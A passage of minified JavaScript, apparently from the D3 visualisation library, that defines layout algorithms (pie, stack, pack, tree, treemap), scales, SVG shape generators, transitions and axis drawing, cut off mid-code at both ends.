e,u;t&&(e=n.children)&&e.sort(t),r&&(u=n.parent)&&(u.value+=n.value)}),a}var t=ei,e=ni,r=ti;return n.sort=function(e){return arguments.length?(t=e,n):t},n.children=function(t){return arguments.length?(e=t,n):e},n.value=function(t){return arguments.length?(r=t,n):r},n.revalue=function(t){return r&&(Ku(t,function(n){n.children&&(n.value=0)}),Qu(t,function(t){var e;t.children||(t.value=+r.call(n,t,t.depth)||0),(e=t.parent)&&(e.value+=t.value)})),t},n},ta.layout.partition=function(){function n(t,e,r,u){var i=t.children;if(t.x=e,t.y=t.depth*u,t.dx=r,t.dy=u,i&&(o=i.length)){var o,a,c,l=-1;for(r=t.value?r/t.value:0;++l<o;)n(a=i[l],e,c=a.value*r,u),e+=c}}function t(n){var e=n.children,r=0;if(e&&(u=e.length))for(var u,i=-1;++i<u;)r=Math.max(r,t(e[i]));return 1+r}function e(e,i){var o=r.call(this,e,i);return n(o[0],0,u[0],u[1]/t(o[0])),o}var r=ta.layout.hierarchy(),u=[1,1];return e.size=function(n){return arguments.length?(u=n,e):u},Gu(e,r)},ta.layout.pie=function(){function n(o){var a,c=o.length,l=o.map(function(e,r){return+t.call(n,e,r)}),s=+("function"==typeof r?r.apply(this,arguments):r),f=("function"==typeof u?u.apply(this,arguments):u)-s,h=Math.min(Math.abs(f)/c,+("function"==typeof i?i.apply(this,arguments):i)),g=h*(0>f?-1:1),p=(f-c*g)/ta.sum(l),v=ta.range(c),d=[];return null!=e&&v.sort(e===pl?function(n,t){return l[t]-l[n]}:function(n,t){return e(o[n],o[t])}),v.forEach(function(n){d[n]={data:o[n],value:a=l[n],startAngle:s,endAngle:s+=a*p+g,padAngle:h}}),d}var t=Number,e=pl,r=0,u=La,i=0;return n.value=function(e){return arguments.length?(t=e,n):t},n.sort=function(t){return arguments.length?(e=t,n):e},n.startAngle=function(t){return arguments.length?(r=t,n):r},n.endAngle=function(t){return arguments.length?(u=t,n):u},n.padAngle=function(t){return arguments.length?(i=t,n):i},n};var pl={};ta.layout.stack=function(){function n(a,c){if(!(h=a.length))return a;var l=a.map(function(e,r){return t.call(n,e,r)}),s=l.map(function(t){return t.map(function(t,e){return[i.call(n,t,e),o.call(n,t,e)]})}),f=e.call(n,s,c);l=ta.permute(l,f),s=ta.permute(s,f);var h,g,p,v,d=r.call(n,s,c),m=l[0].length;for(p=0;m>p;++p)for(u.call(n,l[0][p],v=d[p],s[0][p][1]),g=1;h>g;++g)u.call(n,l[g][p],v+=s[g-1][p][1],s[g][p][1]);return a}var t=y,e=ai,r=ci,u=oi,i=ui,o=ii;return n.values=function(e){return arguments.length?(t=e,n):t},n.order=function(t){return arguments.length?(e="function"==typeof t?t:vl.get(t)||ai,n):e},n.offset=function(t){return arguments.length?(r="function"==typeof t?t:dl.get(t)||ci,n):r},n.x=function(t){return arguments.length?(i=t,n):i},n.y=function(t){return arguments.length?(o=t,n):o},n.out=function(t){return arguments.length?(u=t,n):u},n};var vl=ta.map({"inside-out":function(n){var t,e,r=n.length,u=n.map(li),i=n.map(si),o=ta.range(r).sort(function(n,t){return u[n]-u[t]}),a=0,c=0,l=[],s=[];for(t=0;r>t;++t)e=o[t],c>a?(a+=i[e],l.push(e)):(c+=i[e],s.push(e));return s.reverse().concat(l)},reverse:function(n){return ta.range(n.length).reverse()},"default":ai}),dl=ta.map({silhouette:function(n){var t,e,r,u=n.length,i=n[0].length,o=[],a=0,c=[];for(e=0;i>e;++e){for(t=0,r=0;u>t;t++)r+=n[t][e][1];r>a&&(a=r),o.push(r)}for(e=0;i>e;++e)c[e]=(a-o[e])/2;return c},wiggle:function(n){var t,e,r,u,i,o,a,c,l,s=n.length,f=n[0],h=f.length,g=[];for(g[0]=c=l=0,e=1;h>e;++e){for(t=0,u=0;s>t;++t)u+=n[t][e][1];for(t=0,i=0,a=f[e][0]-f[e-1][0];s>t;++t){for(r=0,o=(n[t][e][1]-n[t][e-1][1])/(2*a);t>r;++r)o+=(n[r][e][1]-n[r][e-1][1])/a;i+=o*n[t][e][1]}g[e]=c-=u?i/u*a:0,l>c&&(l=c)}for(e=0;h>e;++e)g[e]-=l;return g},expand:function(n){var t,e,r,u=n.length,i=n[0].length,o=1/u,a=[];for(e=0;i>e;++e){for(t=0,r=0;u>t;t++)r+=n[t][e][1];if(r)for(t=0;u>t;t++)n[t][e][1]/=r;else for(t=0;u>t;t++)n[t][e][1]=o}for(e=0;i>e;++e)a[e]=0;return a},zero:ci});ta.layout.histogram=function(){function n(n,i){for(var o,a,c=[],l=n.map(e,this),s=r.call(this,l,i),f=u.call(this,s,l,i),i=-1,h=l.length,g=f.length-1,p=t?1:1/h;++i<g;)o=c[i]=[],o.dx=f[i+1]-(o.x=f[i]),o.y=0;if(g>0)for(i=-1;++i<h;)a=l[i],a>=s[0]&&a<=s[1]&&(o=c[ta.bisect(f,a,1,g)-1],o.y+=p,o.push(n[i]));return c}var t=!0,e=Number,r=pi,u=hi;return n.value=function(t){return arguments.length?(e=t,n):e},n.range=function(t){return arguments.length?(r=Et(t),n):r},n.bins=function(t){return arguments.length?(u="number"==typeof t?function(n){return gi(n,t)}:Et(t),n):u},n.frequency=function(e){return arguments.length?(t=!!e,n):t},n},ta.layout.pack=function(){function n(n,i){var o=e.call(this,n,i),a=o[0],c=u[0],l=u[1],s=null==t?Math.sqrt:"function"==typeof t?t:function(){return t};if(a.x=a.y=0,Qu(a,function(n){n.r=+s(n.value)}),Qu(a,Mi),r){var f=r*(t?1:Math.max(2*a.r/c,2*a.r/l))/2;Qu(a,function(n){n.r+=f}),Qu(a,Mi),Qu(a,function(n){n.r-=f})}return _i(a,c/2,l/2,t?1:1/Math.max(2*a.r/c,2*a.r/l)),o}var t,e=ta.layout.hierarchy().sort(vi),r=0,u=[1,1];return n.size=function(t){return arguments.length?(u=t,n):u},n.radius=function(e){return arguments.length?(t=null==e||"function"==typeof e?e:+e,n):t},n.padding=function(t){return arguments.length?(r=+t,n):r},Gu(n,e)},ta.layout.tree=function(){function n(n,u){var s=o.call(this,n,u),f=s[0],h=t(f);if(Qu(h,e),h.parent.m=-h.z,Ku(h,r),l)Ku(f,i);else{var g=f,p=f,v=f;Ku(f,function(n){n.x<g.x&&(g=n),n.x>p.x&&(p=n),n.depth>v.depth&&(v=n)});var d=a(g,p)/2-g.x,m=c[0]/(p.x+a(p,g)/2+d),y=c[1]/(v.depth||1);Ku(f,function(n){n.x=(n.x+d)*m,n.y=n.depth*y})}return s}function t(n){for(var t,e={A:null,children:[n]},r=[e];null!=(t=r.pop());)for(var u,i=t.children,o=0,a=i.length;a>o;++o)r.push((i[o]=u={_:i[o],parent:t,children:(u=i[o].children)&&u.slice()||[],A:null,a:null,z:0,m:0,c:0,s:0,t:null,i:o}).a=u);return e.children[0]}function e(n){var t=n.children,e=n.parent.children,r=n.i?e[n.i-1]:null;if(t.length){Ni(n);var i=(t[0].z+t[t.length-1].z)/2;r?(n.z=r.z+a(n._,r._),n.m=n.z-i):n.z=i}else r&&(n.z=r.z+a(n._,r._));n.parent.A=u(n,r,n.parent.A||e[0])}function r(n){n._.x=n.z+n.parent.m,n.m+=n.parent.m}function u(n,t,e){if(t){for(var r,u=n,i=n,o=t,c=u.parent.children[0],l=u.m,s=i.m,f=o.m,h=c.m;o=Ei(o),u=ki(u),o&&u;)c=ki(c),i=Ei(i),i.a=n,r=o.z+f-u.z-l+a(o._,u._),r>0&&(Ai(Ci(o,n,e),n,r),l+=r,s+=r),f+=o.m,l+=u.m,h+=c.m,s+=i.m;o&&!Ei(i)&&(i.t=o,i.m+=f-s),u&&!ki(c)&&(c.t=u,c.m+=l-h,e=n)}return e}function i(n){n.x*=c[0],n.y=n.depth*c[1]}var o=ta.layout.hierarchy().sort(null).value(null),a=Si,c=[1,1],l=null;return n.separation=function(t){return arguments.length?(a=t,n):a},n.size=function(t){return arguments.length?(l=null==(c=t)?i:null,n):l?null:c},n.nodeSize=function(t){return arguments.length?(l=null==(c=t)?null:i,n):l?c:null},Gu(n,o)},ta.layout.cluster=function(){function n(n,i){var o,a=t.call(this,n,i),c=a[0],l=0;Qu(c,function(n){var t=n.children;t&&t.length?(n.x=qi(t),n.y=zi(t)):(n.x=o?l+=e(n,o):0,n.y=0,o=n)});var s=Li(c),f=Ti(c),h=s.x-e(s,f)/2,g=f.x+e(f,s)/2;return Qu(c,u?function(n){n.x=(n.x-c.x)*r[0],n.y=(c.y-n.y)*r[1]}:function(n){n.x=(n.x-h)/(g-h)*r[0],n.y=(1-(c.y?n.y/c.y:1))*r[1]}),a}var t=ta.layout.hierarchy().sort(null).value(null),e=Si,r=[1,1],u=!1;return n.separation=function(t){return arguments.length?(e=t,n):e},n.size=function(t){return arguments.length?(u=null==(r=t),n):u?null:r},n.nodeSize=function(t){return arguments.length?(u=null!=(r=t),n):u?r:null},Gu(n,t)},ta.layout.treemap=function(){function n(n,t){for(var e,r,u=-1,i=n.length;++u<i;)r=(e=n[u]).value*(0>t?0:t),e.area=isNaN(r)||0>=r?0:r}function t(e){var i=e.children;if(i&&i.length){var o,a,c,l=f(e),s=[],h=i.slice(),p=1/0,v="slice"===g?l.dx:"dice"===g?l.dy:"slice-dice"===g?1&e.depth?l.dy:l.dx:Math.min(l.dx,l.dy);for(n(h,l.dx*l.dy/e.value),s.area=0;(c=h.length)>0;)s.push(o=h[c-1]),s.area+=o.area,"squarify"!==g||(a=r(s,v))<=p?(h.pop(),p=a):(s.area-=s.pop().area,u(s,v,l,!1),v=Math.min(l.dx,l.dy),s.length=s.area=0,p=1/0);s.length&&(u(s,v,l,!0),s.length=s.area=0),i.forEach(t)}}function e(t){var r=t.children;if(r&&r.length){var i,o=f(t),a=r.slice(),c=[];for(n(a,o.dx*o.dy/t.value),c.area=0;i=a.pop();)c.push(i),c.area+=i.area,null!=i.z&&(u(c,i.z?o.dx:o.dy,o,!a.length),c.length=c.area=0);r.forEach(e)}}function r(n,t){for(var e,r=n.area,u=0,i=1/0,o=-1,a=n.length;++o<a;)(e=n[o].area)&&(i>e&&(i=e),e>u&&(u=e));return r*=r,t*=t,r?Math.max(t*u*p/r,r/(t*i*p)):1/0}function u(n,t,e,r){var u,i=-1,o=n.length,a=e.x,l=e.y,s=t?c(n.area/t):0;if(t==e.dx){for((r||s>e.dy)&&(s=e.dy);++i<o;)u=n[i],u.x=a,u.y=l,u.dy=s,a+=u.dx=Math.min(e.x+e.dx-a,s?c(u.area/s):0);u.z=!0,u.dx+=e.x+e.dx-a,e.y+=s,e.dy-=s}else{for((r||s>e.dx)&&(s=e.dx);++i<o;)u=n[i],u.x=a,u.y=l,u.dx=s,l+=u.dy=Math.min(e.y+e.dy-l,s?c(u.area/s):0);u.z=!1,u.dy+=e.y+e.dy-l,e.x+=s,e.dx-=s}}function i(r){var u=o||a(r),i=u[0];return i.x=0,i.y=0,i.dx=l[0],i.dy=l[1],o&&a.revalue(i),n([i],i.dx*i.dy/i.value),(o?e:t)(i),h&&(o=u),u}var o,a=ta.layout.hierarchy(),c=Math.round,l=[1,1],s=null,f=Ri,h=!1,g="squarify",p=.5*(1+Math.sqrt(5));
return i.size=function(n){return arguments.length?(l=n,i):l},i.padding=function(n){function t(t){var e=n.call(i,t,t.depth);return null==e?Ri(t):Di(t,"number"==typeof e?[e,e,e,e]:e)}function e(t){return Di(t,n)}if(!arguments.length)return s;var r;return f=null==(s=n)?Ri:"function"==(r=typeof n)?t:"number"===r?(n=[n,n,n,n],e):e,i},i.round=function(n){return arguments.length?(c=n?Math.round:Number,i):c!=Number},i.sticky=function(n){return arguments.length?(h=n,o=null,i):h},i.ratio=function(n){return arguments.length?(p=n,i):p},i.mode=function(n){return arguments.length?(g=n+"",i):g},Gu(i,a)},ta.random={normal:function(n,t){var e=arguments.length;return 2>e&&(t=1),1>e&&(n=0),function(){var e,r,u;do e=2*Math.random()-1,r=2*Math.random()-1,u=e*e+r*r;while(!u||u>1);return n+t*e*Math.sqrt(-2*Math.log(u)/u)}},logNormal:function(){var n=ta.random.normal.apply(ta,arguments);return function(){return Math.exp(n())}},bates:function(n){var t=ta.random.irwinHall(n);return function(){return t()/n}},irwinHall:function(n){return function(){for(var t=0,e=0;n>e;e++)t+=Math.random();return t}}},ta.scale={};var ml={floor:y,ceil:y};ta.scale.linear=function(){return Ii([0,1],[0,1],mu,!1)};var yl={s:1,g:1,p:1,r:1,e:1};ta.scale.log=function(){return Ji(ta.scale.linear().domain([0,1]),10,!0,[1,10])};var Ml=ta.format(".0e"),xl={floor:function(n){return-Math.ceil(-n)},ceil:function(n){return-Math.floor(-n)}};ta.scale.pow=function(){return Gi(ta.scale.linear(),1,[0,1])},ta.scale.sqrt=function(){return ta.scale.pow().exponent(.5)},ta.scale.ordinal=function(){return Qi([],{t:"range",a:[[]]})},ta.scale.category10=function(){return ta.scale.ordinal().range(bl)},ta.scale.category20=function(){return ta.scale.ordinal().range(_l)},ta.scale.category20b=function(){return ta.scale.ordinal().range(wl)},ta.scale.category20c=function(){return ta.scale.ordinal().range(Sl)};var bl=[2062260,16744206,2924588,14034728,9725885,9197131,14907330,8355711,12369186,1556175].map(Mt),_l=[2062260,11454440,16744206,16759672,2924588,10018698,14034728,16750742,9725885,12955861,9197131,12885140,14907330,16234194,8355711,13092807,12369186,14408589,1556175,10410725].map(Mt),wl=[3750777,5395619,7040719,10264286,6519097,9216594,11915115,13556636,9202993,12426809,15186514,15190932,8666169,11356490,14049643,15177372,8077683,10834324,13528509,14589654].map(Mt),Sl=[3244733,7057110,10406625,13032431,15095053,16616764,16625259,16634018,3253076,7652470,10607003,13101504,7695281,10394312,12369372,14342891,6513507,9868950,12434877,14277081].map(Mt);ta.scale.quantile=function(){return no([],[])},ta.scale.quantize=function(){return to(0,1,[0,1])},ta.scale.threshold=function(){return eo([.5],[0,1])},ta.scale.identity=function(){return ro([0,1])},ta.svg={},ta.svg.arc=function(){function n(){var n=Math.max(0,+e.apply(this,arguments)),l=Math.max(0,+r.apply(this,arguments)),s=o.apply(this,arguments)-Ra,f=a.apply(this,arguments)-Ra,h=Math.abs(f-s),g=s>f?0:1;if(n>l&&(p=l,l=n,n=p),h>=Ta)return t(l,g)+(n?t(n,1-g):"")+"Z";var p,v,d,m,y,M,x,b,_,w,S,k,E=0,A=0,N=[];if((m=(+c.apply(this,arguments)||0)/2)&&(d=i===kl?Math.sqrt(n*n+l*l):+i.apply(this,arguments),g||(A*=-1),l&&(A=tt(d/l*Math.sin(m))),n&&(E=tt(d/n*Math.sin(m)))),l){y=l*Math.cos(s+A),M=l*Math.sin(s+A),x=l*Math.cos(f-A),b=l*Math.sin(f-A);var C=Math.abs(f-s-2*A)<=qa?0:1;if(A&&so(y,M,x,b)===g^C){var z=(s+f)/2;y=l*Math.cos(z),M=l*Math.sin(z),x=b=null}}else y=M=0;if(n){_=n*Math.cos(f-E),w=n*Math.sin(f-E),S=n*Math.cos(s+E),k=n*Math.sin(s+E);var q=Math.abs(s-f+2*E)<=qa?0:1;if(E&&so(_,w,S,k)===1-g^q){var L=(s+f)/2;_=n*Math.cos(L),w=n*Math.sin(L),S=k=null}}else _=w=0;if((p=Math.min(Math.abs(l-n)/2,+u.apply(this,arguments)))>.001){v=l>n^g?0:1;var T=null==S?[_,w]:null==x?[y,M]:Lr([y,M],[S,k],[x,b],[_,w]),R=y-T[0],D=M-T[1],P=x-T[0],U=b-T[1],j=1/Math.sin(Math.acos((R*P+D*U)/(Math.sqrt(R*R+D*D)*Math.sqrt(P*P+U*U)))/2),F=Math.sqrt(T[0]*T[0]+T[1]*T[1]);if(null!=x){var H=Math.min(p,(l-F)/(j+1)),O=fo(null==S?[_,w]:[S,k],[y,M],l,H,g),I=fo([x,b],[_,w],l,H,g);p===H?N.push("M",O[0],"A",H,",",H," 0 0,",v," ",O[1],"A",l,",",l," 0 ",1-g^so(O[1][0],O[1][1],I[1][0],I[1][1]),",",g," ",I[1],"A",H,",",H," 0 0,",v," ",I[0]):N.push("M",O[0],"A",H,",",H," 0 1,",v," ",I[0])}else N.push("M",y,",",M);if(null!=S){var Y=Math.min(p,(n-F)/(j-1)),Z=fo([y,M],[S,k],n,-Y,g),V=fo([_,w],null==x?[y,M]:[x,b],n,-Y,g);p===Y?N.push("L",V[0],"A",Y,",",Y," 0 0,",v," ",V[1],"A",n,",",n," 0 ",g^so(V[1][0],V[1][1],Z[1][0],Z[1][1]),",",1-g," ",Z[1],"A",Y,",",Y," 0 0,",v," ",Z[0]):N.push("L",V[0],"A",Y,",",Y," 0 0,",v," ",Z[0])}else N.push("L",_,",",w)}else N.push("M",y,",",M),null!=x&&N.push("A",l,",",l," 0 ",C,",",g," ",x,",",b),N.push("L",_,",",w),null!=S&&N.push("A",n,",",n," 0 ",q,",",1-g," ",S,",",k);return N.push("Z"),N.join("")}function t(n,t){return"M0,"+n+"A"+n+","+n+" 0 1,"+t+" 0,"+-n+"A"+n+","+n+" 0 1,"+t+" 0,"+n}var e=io,r=oo,u=uo,i=kl,o=ao,a=co,c=lo;return n.innerRadius=function(t){return arguments.length?(e=Et(t),n):e},n.outerRadius=function(t){return arguments.length?(r=Et(t),n):r},n.cornerRadius=function(t){return arguments.length?(u=Et(t),n):u},n.padRadius=function(t){return arguments.length?(i=t==kl?kl:Et(t),n):i},n.startAngle=function(t){return arguments.length?(o=Et(t),n):o},n.endAngle=function(t){return arguments.length?(a=Et(t),n):a},n.padAngle=function(t){return arguments.length?(c=Et(t),n):c},n.centroid=function(){var n=(+e.apply(this,arguments)+ +r.apply(this,arguments))/2,t=(+o.apply(this,arguments)+ +a.apply(this,arguments))/2-Ra;return[Math.cos(t)*n,Math.sin(t)*n]},n};var kl="auto";ta.svg.line=function(){return ho(y)};var El=ta.map({linear:go,"linear-closed":po,step:vo,"step-before":mo,"step-after":yo,basis:So,"basis-open":ko,"basis-closed":Eo,bundle:Ao,cardinal:bo,"cardinal-open":Mo,"cardinal-closed":xo,monotone:To});El.forEach(function(n,t){t.key=n,t.closed=/-closed$/.test(n)});var Al=[0,2/3,1/3,0],Nl=[0,1/3,2/3,0],Cl=[0,1/6,2/3,1/6];ta.svg.line.radial=function(){var n=ho(Ro);return n.radius=n.x,delete n.x,n.angle=n.y,delete n.y,n},mo.reverse=yo,yo.reverse=mo,ta.svg.area=function(){return Do(y)},ta.svg.area.radial=function(){var n=Do(Ro);return n.radius=n.x,delete n.x,n.innerRadius=n.x0,delete n.x0,n.outerRadius=n.x1,delete n.x1,n.angle=n.y,delete n.y,n.startAngle=n.y0,delete n.y0,n.endAngle=n.y1,delete n.y1,n},ta.svg.chord=function(){function n(n,a){var c=t(this,i,n,a),l=t(this,o,n,a);return"M"+c.p0+r(c.r,c.p1,c.a1-c.a0)+(e(c,l)?u(c.r,c.p1,c.r,c.p0):u(c.r,c.p1,l.r,l.p0)+r(l.r,l.p1,l.a1-l.a0)+u(l.r,l.p1,c.r,c.p0))+"Z"}function t(n,t,e,r){var u=t.call(n,e,r),i=a.call(n,u,r),o=c.call(n,u,r)-Ra,s=l.call(n,u,r)-Ra;return{r:i,a0:o,a1:s,p0:[i*Math.cos(o),i*Math.sin(o)],p1:[i*Math.cos(s),i*Math.sin(s)]}}function e(n,t){return n.a0==t.a0&&n.a1==t.a1}function r(n,t,e){return"A"+n+","+n+" 0 "+ +(e>qa)+",1 "+t}function u(n,t,e,r){return"Q 0,0 "+r}var i=mr,o=yr,a=Po,c=ao,l=co;return n.radius=function(t){return arguments.length?(a=Et(t),n):a},n.source=function(t){return arguments.length?(i=Et(t),n):i},n.target=function(t){return arguments.length?(o=Et(t),n):o},n.startAngle=function(t){return arguments.length?(c=Et(t),n):c},n.endAngle=function(t){return arguments.length?(l=Et(t),n):l},n},ta.svg.diagonal=function(){function n(n,u){var i=t.call(this,n,u),o=e.call(this,n,u),a=(i.y+o.y)/2,c=[i,{x:i.x,y:a},{x:o.x,y:a},o];return c=c.map(r),"M"+c[0]+"C"+c[1]+" "+c[2]+" "+c[3]}var t=mr,e=yr,r=Uo;return n.source=function(e){return arguments.length?(t=Et(e),n):t},n.target=function(t){return arguments.length?(e=Et(t),n):e},n.projection=function(t){return arguments.length?(r=t,n):r},n},ta.svg.diagonal.radial=function(){var n=ta.svg.diagonal(),t=Uo,e=n.projection;return n.projection=function(n){return arguments.length?e(jo(t=n)):t},n},ta.svg.symbol=function(){function n(n,r){return(zl.get(t.call(this,n,r))||Oo)(e.call(this,n,r))}var t=Ho,e=Fo;return n.type=function(e){return arguments.length?(t=Et(e),n):t},n.size=function(t){return arguments.length?(e=Et(t),n):e},n};var zl=ta.map({circle:Oo,cross:function(n){var t=Math.sqrt(n/5)/2;return"M"+-3*t+","+-t+"H"+-t+"V"+-3*t+"H"+t+"V"+-t+"H"+3*t+"V"+t+"H"+t+"V"+3*t+"H"+-t+"V"+t+"H"+-3*t+"Z"},diamond:function(n){var t=Math.sqrt(n/(2*Ll)),e=t*Ll;return"M0,"+-t+"L"+e+",0 0,"+t+" "+-e+",0Z"},square:function(n){var t=Math.sqrt(n)/2;return"M"+-t+","+-t+"L"+t+","+-t+" "+t+","+t+" "+-t+","+t+"Z"},"triangle-down":function(n){var t=Math.sqrt(n/ql),e=t*ql/2;return"M0,"+e+"L"+t+","+-e+" "+-t+","+-e+"Z"},"triangle-up":function(n){var t=Math.sqrt(n/ql),e=t*ql/2;return"M0,"+-e+"L"+t+","+e+" "+-t+","+e+"Z"}});ta.svg.symbolTypes=zl.keys();var ql=Math.sqrt(3),Ll=Math.tan(30*Da);_a.transition=function(n){for(var t,e,r=Tl||++Ul,u=Xo(n),i=[],o=Rl||{time:Date.now(),ease:Su,delay:0,duration:250},a=-1,c=this.length;++a<c;){i.push(t=[]);for(var l=this[a],s=-1,f=l.length;++s<f;)(e=l[s])&&$o(e,s,u,r,o),t.push(e)}return Yo(i,u,r)},_a.interrupt=function(n){return this.each(null==n?Dl:Io(Xo(n)))};var Tl,Rl,Dl=Io(Xo()),Pl=[],Ul=0;Pl.call=_a.call,Pl.empty=_a.empty,Pl.node=_a.node,Pl.size=_a.size,ta.transition=function(n,t){return n&&n.transition?Tl?n.transition(t):n:ta.selection().transition(n)},ta.transition.prototype=Pl,Pl.select=function(n){var t,e,r,u=this.id,i=this.namespace,o=[];n=N(n);for(var a=-1,c=this.length;++a<c;){o.push(t=[]);for(var l=this[a],s=-1,f=l.length;++s<f;)(r=l[s])&&(e=n.call(r,r.__data__,s,a))?("__data__"in r&&(e.__data__=r.__data__),$o(e,s,i,u,r[i][u]),t.push(e)):t.push(null)}return Yo(o,i,u)},Pl.selectAll=function(n){var t,e,r,u,i,o=this.id,a=this.namespace,c=[];n=C(n);for(var l=-1,s=this.length;++l<s;)for(var f=this[l],h=-1,g=f.length;++h<g;)if(r=f[h]){i=r[a][o],e=n.call(r,r.__data__,h,l),c.push(t=[]);for(var p=-1,v=e.length;++p<v;)(u=e[p])&&$o(u,p,a,o,i),t.push(u)}return Yo(c,a,o)},Pl.filter=function(n){var t,e,r,u=[];"function"!=typeof n&&(n=O(n));for(var i=0,o=this.length;o>i;i++){u.push(t=[]);for(var e=this[i],a=0,c=e.length;c>a;a++)(r=e[a])&&n.call(r,r.__data__,a,i)&&t.push(r)}return Yo(u,this.namespace,this.id)},Pl.tween=function(n,t){var e=this.id,r=this.namespace;return arguments.length<2?this.node()[r][e].tween.get(n):Y(this,null==t?function(t){t[r][e].tween.remove(n)}:function(u){u[r][e].tween.set(n,t)})},Pl.attr=function(n,t){function e(){this.removeAttribute(a)}function r(){this.removeAttributeNS(a.space,a.local)}function u(n){return null==n?e:(n+="",function(){var t,e=this.getAttribute(a);return e!==n&&(t=o(e,n),function(n){this.setAttribute(a,t(n))})})}function i(n){return null==n?r:(n+="",function(){var t,e=this.getAttributeNS(a.space,a.local);return e!==n&&(t=o(e,n),function(n){this.setAttributeNS(a.space,a.local,t(n))})})}if(arguments.length<2){for(t in n)this.attr(t,n[t]);return this}var o="transform"==n?Hu:mu,a=ta.ns.qualify(n);return Zo(this,"attr."+n,t,a.local?i:u)},Pl.attrTween=function(n,t){function e(n,e){var r=t.call(this,n,e,this.getAttribute(u));return r&&function(n){this.setAttribute(u,r(n))}}function r(n,e){var r=t.call(this,n,e,this.getAttributeNS(u.space,u.local));return r&&function(n){this.setAttributeNS(u.space,u.local,r(n))}}var u=ta.ns.qualify(n);return this.tween("attr."+n,u.local?r:e)},Pl.style=function(n,e,r){function u(){this.style.removeProperty(n)}function i(e){return null==e?u:(e+="",function(){var u,i=t(this).getComputedStyle(this,null).getPropertyValue(n);return i!==e&&(u=mu(i,e),function(t){this.style.setProperty(n,u(t),r)})})}var o=arguments.length;if(3>o){if("string"!=typeof n){2>o&&(e="");for(r in n)this.style(r,n[r],e);return this}r=""}return Zo(this,"style."+n,e,i)},Pl.styleTween=function(n,e,r){function u(u,i){var o=e.call(this,u,i,t(this).getComputedStyle(this,null).getPropertyValue(n));return o&&function(t){this.style.setProperty(n,o(t),r)}}return arguments.length<3&&(r=""),this.tween("style."+n,u)},Pl.text=function(n){return Zo(this,"text",n,Vo)},Pl.remove=function(){var n=this.namespace;return this.each("end.transition",function(){var t;this[n].count<2&&(t=this.parentNode)&&t.removeChild(this)})},Pl.ease=function(n){var t=this.id,e=this.namespace;return arguments.length<1?this.node()[e][t].ease:("function"!=typeof n&&(n=ta.ease.apply(ta,arguments)),Y(this,function(r){r[e][t].ease=n}))},Pl.delay=function(n){var t=this.id,e=this.namespace;return arguments.length<1?this.node()[e][t].delay:Y(this,"function"==typeof n?function(r,u,i){r[e][t].delay=+n.call(r,r.__data__,u,i)}:(n=+n,function(r){r[e][t].delay=n}))},Pl.duration=function(n){var t=this.id,e=this.namespace;return arguments.length<1?this.node()[e][t].duration:Y(this,"function"==typeof n?function(r,u,i){r[e][t].duration=Math.max(1,n.call(r,r.__data__,u,i))}:(n=Math.max(1,n),function(r){r[e][t].duration=n}))},Pl.each=function(n,t){var e=this.id,r=this.namespace;if(arguments.length<2){var u=Rl,i=Tl;try{Tl=e,Y(this,function(t,u,i){Rl=t[r][e],n.call(t,t.__data__,u,i)})}finally{Rl=u,Tl=i}}else Y(this,function(u){var i=u[r][e];(i.event||(i.event=ta.dispatch("start","end","interrupt"))).on(n,t)});return this},Pl.transition=function(){for(var n,t,e,r,u=this.id,i=++Ul,o=this.namespace,a=[],c=0,l=this.length;l>c;c++){a.push(n=[]);for(var t=this[c],s=0,f=t.length;f>s;s++)(e=t[s])&&(r=e[o][u],$o(e,s,o,i,{time:r.time,ease:r.ease,delay:r.delay+r.duration,duration:r.duration})),n.push(e)}return Yo(a,o,i)},ta.svg.axis=function(){function n(n){n.each(function(){var n,l=ta.select(this),s=this.__chart__||e,f=this.__chart__=e.copy(),h=null==c?f.ticks?f.ticks.apply(f,a):f.domain():c,g=null==t?f.tickFormat?f.tickFormat.apply(f,a):y:t,p=l.selectAll(".tick").data(h,f),v=p.enter().insert("g",".domain").attr("class","tick").style("opacity",Ca),d=ta.transition(p.exit()).style("opacity",Ca).remove(),m=ta.transition(p.order()).style("opacity",1),M=Math.max(u,0)+o,x=Ui(f),b=l.selectAll(".domain").data([0]),_=(b.enter().append("path").attr("class","domain"),ta.transition(b));v.append("line"),v.append("text");var w,S,k,E,A=v.select("line"),N=m.select("line"),C=p.select("text").text(g),z=v.select("text"),q=m.select("text"),L="top"===r||"left"===r?-1:1;if("bottom"===r||"top"===r?(n=Bo,w="x",k="y",S="x2",E="y2",C.attr("dy",0>L?"0em":".71em").style("text-anchor","middle"),_.attr("d","M"+x[0]+","+L*i+"V0H"+x[1]+"V"+L*i)):(n=Wo,w="y",k="x",S="y2",E="x2",C.attr("dy",".32em").style("text-anchor",0>L?"end":"start"),_.attr("d","M"+L*i+","+x[0]+"H0V"+x[1]+"H"+L*i)),A.attr(E,L*u),z.attr(k,L*M),N.attr(S,0).attr(E,L*u),q.attr(w,0).attr(k,L*M),f.rangeBand){var T=f,R=T.rangeBand()/2;s=f=function(n){return T(n)+R}}else s.rangeBand?s=f:d.call(n,f,s);v.call(n,s,f),m.call(n,f,f)})}var t,e=ta.scale.linear(),r=jl,u=6,i=6,o=3,a=[10],c=null;return n.scale=function(t){return arguments.length?(e=t,n):e},n.orient=function(t){return arguments.length?(r=t in Fl?t+"":jl,n):r},n.ticks=function(){return arguments.length?(a=arguments,n):a},n.tickValues=function(t){return arguments.length?(c=t,n):c},n.tickFormat=function(e){return arguments.length?(t=e,n):t},n.tickSize=function(t){var e=arguments.length;return e?(u=+t,i=+arguments[e-1],n):u},n.innerTickSize=function(t){return arguments.length?(u=+t,n):u},n.outerTickSize=function(t){return arguments.length?(i=+t,n):i},n.tickPadding=function(t){return arguments.length?(o=+t,n):o},n.tickSubdivide=function(){return arguments.length&&n},n};var jl="bottom",Fl={top:1,right:1,bottom:1,left:1};ta.svg.brush=function(){function n(t){t.each(function(){var t=ta.select(this).style("pointer-events","all").style("-webkit-tap-highlight-color","rgba(0,0,0,0)").on("mousedown.brush",i).on("touchstart.brush",i),o=t.selectAll(".background").data([0]);o.enter().append("rect").attr("class","background").style("visibility","hidden").style("cursor","crosshair"),t.selectAll(".extent").data([0]).enter().append("rect").attr("class","extent").style("cursor","move");var a=t.selectAll(".resize").data(v,y);a.exit().remove(),a.enter().append("g").attr("class",function(n){return"resize "+n}).style("cursor",function(n){return Hl[n]}).append("rect").attr("x",function(n){return/[ew]$/.test(n)?-3:null}).attr("y",function(n){return/^[ns]/.test(n)?-3:null}).attr("width",6).attr("height",6).style("visibility","hidden"),a.style("display",n.empty()?"none":null);var 